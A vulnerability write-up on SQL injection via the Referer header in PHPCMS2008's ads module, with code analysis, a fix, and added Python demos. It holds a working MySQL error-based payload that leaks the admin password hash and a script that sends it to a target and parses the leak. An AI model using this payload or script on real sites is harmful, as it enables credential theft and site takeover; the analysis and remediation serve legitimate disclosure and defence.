00 Vulnerability Description
PHPCMS2008 checks the Referer header of its advertising module too loosely, which leads to a SQL injection vulnerability. An attacker can read the administrator's username and password hash, log in to the admin backend, obtain a webshell, and use it to penetrate the server further.
01 Vulnerability Analysis
The vulnerability lives in the show() method of /ads/include/ads_place.class.php:
function show($placeid)
{
    ...
    if ($adses[0]['option'])
    {
        foreach ($adses as $ads)
        {
            $contents[] = ads_content($ads, 1);
            // the raw Referer value ($this->referrer) is concatenated into the query text
            $this->db->query("INSERT INTO `$this->stat_table` (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$this->referrer', '$time', '0')");
            $template = $ads['template'] ? $ads['template'] : 'ads';
        }
    }
    ...
}
In the SQL statement
$this->db->query("INSERT INTO `$this->stat_table` (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$this->referrer', '$time', '0')");
$this->referrer holds the Referer field of the HTTP request header, and the method writes it into the database directly, without any filtering or escaping (the value is populated by PHPCMS itself while the request is processed, not by this module).
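To make the problem concrete, the following added example (not PHPCMS code, and not part of the original write-up) models the INSERT from show() in Python and runs it against an in-memory SQLite database, once with the Referer concatenated into the SQL text as the vulnerable code does, and once with the Referer bound as a parameter. The stat table name ads_stat, the phpcms_member schema and the sample password hash are constructed for the example; only the column list (adsid, username, ip, referer, clicktime, type) comes from the page. SQLite has no equivalent of MySQL's floor()/rand(0) error trick, so the subquery's result is shown by reading the stat table back rather than by provoking an error.

```python
import sqlite3

# Added example, not PHPCMS code. Table name ads_stat, the phpcms_member
# schema and the hash below are constructed for the demonstration.

def build_vulnerable_insert(referer, adsid="1", username="", ip="127.0.0.1", clicktime="0"):
    """Mirror of the vulnerable statement in show(): every value, including the
    raw HTTP Referer header, is concatenated into the SQL text."""
    return (
        "INSERT INTO ads_stat (adsid, username, ip, referer, clicktime, type) "
        f"VALUES ('{adsid}', '{username}', '{ip}', '{referer}', '{clicktime}', '0')"
    )

def fresh_db():
    """Constructed schema: the click-stat table plus a member table holding
    one fake password hash that the injection will pull out."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ads_stat (adsid, username, ip, referer, clicktime, type);
        CREATE TABLE phpcms_member (username, password);
        INSERT INTO phpcms_member VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db

def log_click_vulnerable(db, referer):
    """Run the concatenated statement and return what landed in the referer column."""
    db.execute(build_vulnerable_insert(referer))
    return db.execute("SELECT referer FROM ads_stat").fetchone()[0]

def log_click_safe(db, referer, adsid="1", username="", ip="127.0.0.1", clicktime="0"):
    """Hardened form: the driver binds the Referer as data, so quotes inside it
    cannot change the structure of the statement."""
    db.execute(
        "INSERT INTO ads_stat (adsid, username, ip, referer, clicktime, type) "
        "VALUES (?, ?, ?, ?, ?, ?)",
        (adsid, username, ip, referer, clicktime, "0"),
    )
    return db.execute("SELECT referer FROM ads_stat").fetchone()[0]

# A Referer that closes the quoted literal and splices in a subquery on the
# member table: the same primitive the MySQL floor() payload uses later on.
PAYLOAD = "' || (SELECT password FROM phpcms_member LIMIT 1) || '"

if __name__ == "__main__":
    print(log_click_vulnerable(fresh_db(), PAYLOAD))  # hash read out of phpcms_member
    print(log_click_safe(fresh_db(), PAYLOAD))        # the payload text, stored verbatim
```

With concatenation the stat row ends up holding the admin's hash, because the attacker's subquery executed as SQL; with binding, the identical header is stored as an opaque string and no query runs.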
Having found the vulnerable point, the next step is to find a page that ordinary users can reach and that calls it. A vulnerability users cannot trigger, for example one reachable only by the administrator, is of little practical value.
Tracing the callers backwards shows which pages reach it.
Page /ads/include/common.inc.php:
<?php
...
require MOD_ROOT.'include/ads_place.class.php';
require MOD_ROOT.'include/ads.class.php';
...
?>
Looking one level up, /ads/include/common.inc.php is included by /ads/ad.php:
<?php
...
require './include/common.inc.php';
...
?>
ad.php is reachable by ordinary users, but it is sometimes not accessible directly, so keep tracing upward to /data/js.php:
<?php
chdir('../ads/');
require './ad.php';
?>
js.php is loaded whenever a user visits the home page. A request to it can carry a malicious Referer header, which passes through these layers of includes into the dangerous show() method and triggers the SQL injection.
02 Exploiting the Vulnerability
There are many ways to modify the Referer request header, for example Burp Suite or Tamper Data.
Here it is modified directly with Firefox's Tamper Data:
Click Start Tamper, then visit http://your-addr/data/js.php?id=1
Tamper Data pops up; in the right-hand box, right-click, add an element, and fill in the payload as its value:
Referer=1', (select 1 from (select count(*), concat(floor(rand(0)*2), char(45,45,45), (select password from phpcms_member limit 1)) a from information_schema.tables group by a) b), '0') #
A word of explanation: the vulnerable statement is an INSERT, so nothing it returns is echoed back to the attacker. Blind injection would work, but error-based injection with floor() is used here because it leaks the value in a single request, provided the application displays database errors. For the principle behind floor() error-based injection, see the usage of the floor function.
Substituted into the vulnerable SQL statement the payload becomes:
$this->db->query("INSERT INTO `$this->stat_table` (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '1', (select 1 from (select count(*), concat(floor(rand(0)*2), char(45,45,45), (select password from phpcms_member limit 1)) a from information_schema.tables group by a) b), '0') #', '$time', '0')");
The first `1'` closes the referer literal, the subquery takes the place of the clicktime value, `'0'` fills the type column, and `#` comments out the rest of the original statement. The duplicate-key error MySQL raises when the grouped rand() values collide carries the selected password hash in its message.
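The manual Tamper Data step can be scripted. The following added example (not from the original write-up) sends the page's payload in the Referer header and parses the MySQL duplicate-key error out of the response. It assumes the target URL from the page (http://your-addr/data/js.php?id=1) and that the application echoes database errors into the page, which floor()-based injection relies on; the sample response body is constructed, not captured from a real server.

```python
import re
import urllib.request

# Added example, not the page's own code. Target URL and the echoed-error
# assumption are taken from the write-up; the sample body below is constructed.

# The page's payload: closes the referer literal, puts the error-raising
# subquery into the clicktime slot, supplies '0' for type, comments out the rest.
PAYLOAD = (
    "1', (select 1 from (select count(*), concat(floor(rand(0)*2), char(45,45,45), "
    "(select password from phpcms_member limit 1)) a from information_schema.tables "
    "group by a) b), '0') #"
)

# MySQL error 1062 reads: Duplicate entry '<floor bit>---<password>' for key 'group_key'
# char(45,45,45) is the '---' separator chosen in the payload.
DUPLICATE_RE = re.compile(r"Duplicate entry '[01]---([^']*)' for key")

def extract_password(response_body):
    """Return the leaked password column from the duplicate-key error, or None
    when the response contains no such MySQL error text."""
    m = DUPLICATE_RE.search(response_body)
    return m.group(1) if m else None

def fetch(target="http://your-addr/data/js.php?id=1", referer=PAYLOAD):
    """Issue the GET with the crafted Referer header and return the body text."""
    req = urllib.request.Request(target, headers={"Referer": referer})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")

# Constructed sample of what an error-echoing page would return.
SAMPLE_BODY = (
    "MySQL Query Error: Duplicate entry "
    "'1---e10adc3949ba59abbe56e057f20f883e' for key 'group_key'"
)

if __name__ == "__main__":
    print(extract_password(SAMPLE_BODY))
    # Against a live target: print(extract_password(fetch()))
```

If the site suppresses database errors, extract_password() returns None and the injection still fires; in that case a time-based or boolean-based blind technique would be needed instead.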
03 Fixing the Vulnerability
Filter the field before it reaches the query:
$referer = safe_replace($this->referrer);
$this->db->query("INSERT INTO `$this->stat_table` (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$referer', '$time', '0')");
$template = $ads['template'] ? $ads['template'] : 'ads';
safe_replace() is the filtering function that ships with PHPCMS2008; it strips or escapes the metacharacters the injection depends on. Escaping the value with the database driver's own escape function, or binding it as a query parameter, is the more robust fix, and the same treatment should be applied to every other request-derived value that this module concatenates into SQL.
That concludes this introduction to the PHPCMS2008 ads module SQL injection vulnerability. If you have questions, leave a comment and the editor will reply promptly. Thanks also to the Yunqi Community website for its support.